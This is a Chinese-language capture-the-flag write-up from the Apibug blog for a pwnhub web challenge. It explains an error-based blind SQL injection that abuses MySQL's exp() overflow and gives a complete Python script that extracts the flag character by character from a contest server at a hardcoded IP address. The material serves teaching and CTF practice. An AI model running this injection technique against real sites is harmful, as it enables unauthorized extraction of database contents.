pwnhub公开赛WEB题解题思路-Apibug

做题的时候有点晚。很多赛题都关闭了。

Easy_think

根据代码提示，添加id参数

发现无任何结果，添加单引号报错可查看到sql语句。

无单引号保护，但由于没有回显位置所以常规的and 1=2 union select x,x,x from xxx是无法得到结果的。

通过updatexml进行注入发现只允许提交常量，关键字无法使用。

由于整个页面全部是空白的，无论ID是多少都是没有任何的回显，通过x=x的盲注明显是行不通了，所以必须强制产生错误来进行盲注的猜解。

这里用的exp函数

Exp函数介绍：

函数返回e(自然对数的底)到X次方的值此函数返回e(自然对数的底)的X次方的值。

示例：

这个函数存在一个问题，如果传入一个极大数会导致整形溢出出现报错。

使用exp函数进行盲注

以下是脚本代码:


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

strs='qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_-!@#$%^&*()'
flag=''
start=1
while start<50:
    for i in strs:
        ordnum=ord(i)
        url='http://52.130.87.223:10000/?id=5%20and%20exp((if((ascii(substr((select flag from flag),'+str(start)+',1))='+str(ordnum)+'),10,100000000000000000000)))'
        #print(url)
        html=requests.get(url).text
        if 'array_change_key_case' not in html:
            flag+=i
            print(flag)
            break
    start+=1

获取FLAG：

版权声明 1、本网站名称：Apibug
2、本站永久网址：https://www.apibug.com
3、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ9147218进行删除处理。
4、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6、本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END